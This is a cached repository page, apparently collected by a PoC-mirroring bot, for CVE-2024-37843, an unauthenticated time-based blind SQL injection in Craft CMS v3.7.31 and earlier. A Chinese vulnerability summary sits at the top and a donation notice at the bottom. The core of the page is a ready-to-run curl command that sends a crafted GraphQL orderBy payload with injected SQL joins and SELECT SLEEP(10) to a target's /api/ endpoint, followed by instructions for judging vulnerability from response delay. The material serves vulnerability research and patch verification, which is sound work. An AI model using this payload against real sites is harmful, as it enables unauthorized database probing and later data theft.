CVE-2024-37843 PoC — CraftCMS 安全漏洞

Source

https://github.com/gsmith257-cyber/CVE-2024-37843-POC

Associated Vulnerability

Title:CraftCMS 安全漏洞 (CVE-2024-37843)
Description:CraftCMS是CraftCMS公司的一个内容管理系统。 CraftCMS v3.7.31版本及之前版本存在安全漏洞。攻击者利用该漏洞通过 GraphQL API 端点执行 SQL 注入攻击。

Description

POC for CVE-2024-37843. Craft CMS time-based blind SQLi

Readme

# CVE-2024-37843-POC
POC for CVE-2024-37843. Craft CMS time-based blind SQLi

## Details available in [blog](https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql) 

## POC

```
curl -X POST '<URL>/api/' -H 'Content-Type:application/json' -d '{"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId` -- \\\\` \\n \\n LIMIT 5) AS `subquery`\\nINNER JOIN `assets` `assets` ON `assets`.`id` = `subquery`.`elementsId`\\nINNER JOIN `volumefolders` `volumeFolders` ON `volumeFolders`.`id` = `assets`.`folderId`\\nINNER JOIN `elements` `elements` ON `elements`.`id` = `subquery`.`elementsId`\\nINNER JOIN `elements_sites` `elements_sites` ON `elements_sites`.`id` = `subquery`.`elementsSitesId`\\nINNER JOIN `content` `content` ON `content`.`id` = `subquery`.`contentId`\\nORDER BY `assets`.`volumeId`; SELECT SLEEP(10) ; --\", limit: 5){filename}}"}'
```

You can adjust the SLEEP(10) to your needs but if the response to this curl request is >10 the API is vulnerable.

File Snapshot


 [4.0K]  /data/pocs/94b37c23f1ed6f258ef008d8644c3555f48133a4
├── [1.0K]  LICENSE
└── [1003]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!